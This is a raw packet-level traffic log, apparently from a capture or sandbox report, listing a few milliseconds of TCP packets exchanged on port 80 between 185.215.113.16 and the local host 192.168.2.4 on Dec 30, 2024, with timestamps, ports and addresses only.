Dec 30, 2024 15:53:36.774027109 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774038076 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774044037 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774059057 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774068117 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774074078 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774087906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774101973 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774101973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774117947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774126053 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774132013 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774147034 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774162054 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774177074 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774188042 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774193048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774208069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774221897 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774224043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774239063 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774245024 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774256945 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774280071 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774538994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774554968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774570942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774586916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774593115 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774605036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774625063 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774627924 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774652004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774656057 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774667025 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774682999 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774692059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774697065 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774713993 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774724960 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774729967 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774744987 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774755001 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774760008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774781942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774805069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774818897 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774818897 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774833918 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774849892 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774868011 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774890900 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.774941921 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774956942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774972916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.774986982 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775002003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775006056 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775017977 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775028944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775032043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775048018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775057077 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775068998 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775083065 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775091887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775108099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775122881 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775137901 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775152922 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775167942 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775173903 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775183916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775193930 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775197983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775217056 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775226116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775229931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775247097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775257111 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775262117 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775276899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775286913 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775290966 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775305986 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775319099 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775331020 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775351048 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775357008 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775366068 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775383949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775398970 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775414944 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775423050 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775429964 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775451899 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775453091 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775470018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775485992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775502920 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775517941 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775526047 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775533915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775557041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775804043 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775820017 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775835991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775851965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775866032 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775876045 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775882006 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775897026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775899887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775940895 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.775950909 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775975943 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.775990963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776006937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776011944 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776021957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776037931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776048899 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776053905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776068926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776081085 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776092052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776108980 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776113033 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776123047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776144981 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776149035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776164055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776180983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776189089 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776196003 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776211023 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776217937 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776226997 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776242018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776252031 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776257992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776273012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776282072 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776289940 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776304007 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776318073 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776334047 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776344061 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776348114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776362896 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776372910 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776377916 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776393890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776408911 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776420116 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776424885 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776438951 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776439905 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776454926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776462078 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776469946 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776487112 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776493073 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776529074 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776813030 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776829004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776844978 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776860952 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776869059 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776875973 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776894093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776905060 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776909113 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776923895 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776938915 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776948929 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776962042 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.776962996 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776978970 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.776993036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777009010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777024984 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777026892 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777040005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777062893 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777064085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777077913 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777079105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777093887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777117968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777120113 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777132988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777137041 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777147055 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777162075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777175903 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777182102 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777193069 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777203083 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777209044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777224064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777239084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777247906 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777256012 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777268887 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777271986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777285099 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777298927 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777302027 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777313948 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777326107 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777328968 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777343988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777359962 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777367115 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777375937 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777390957 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777396917 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777406931 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777416945 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777421951 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777436972 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777446985 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777451992 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777477026 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777762890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777786016 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777801991 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777808905 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777817965 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777832031 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777848005 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777863026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777865887 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777878046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777893066 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777905941 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777915001 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777920961 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777930021 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777937889 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777940035 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777946949 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777961969 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777975082 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.777976036 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.777992010 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778003931 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778006077 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778017998 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778021097 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778034925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778043985 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778058052 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778074026 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778078079 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778089046 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778105021 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778114080 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778119087 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778134108 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778148890 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778162956 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778166056 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778181076 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778191090 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778194904 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778202057 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778209925 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778225899 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778239012 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778240919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778256893 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778263092 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778270960 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778285027 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778299093 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778301954 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778314114 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778325081 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778331995 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778346062 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778354883 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778361082 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778376102 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778393984 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778414965 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778626919 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778644085 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778659105 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778675079 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778683901 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778723955 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778788090 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778804064 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778819084 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778832912 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778844118 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778847933 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778862953 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778870106 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778877974 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778892994 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778899908 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778908014 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778923035 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778934002 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778947115 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778963089 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778966904 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.778976917 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.778991938 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779009104 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779019117 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779022932 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779038906 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779050112 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779053926 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779061079 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779068947 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779083967 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779098988 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779107094 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779114008 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779128075 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779143095 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779149055 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779150963 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779160023 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779165983 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779181004 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779182911 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779196024 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779207945 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779211044 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779227018 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779237986 CET	49744	80	192.168.2.4	185.215.113.16
Dec 30, 2024 15:53:36.779242039 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779257059 CET	80	49744	185.215.113.16	192.168.2.4
Dec 30, 2024 15:53:36.779272079 CET	80	49744	185.215.113.16	192.168.2.4
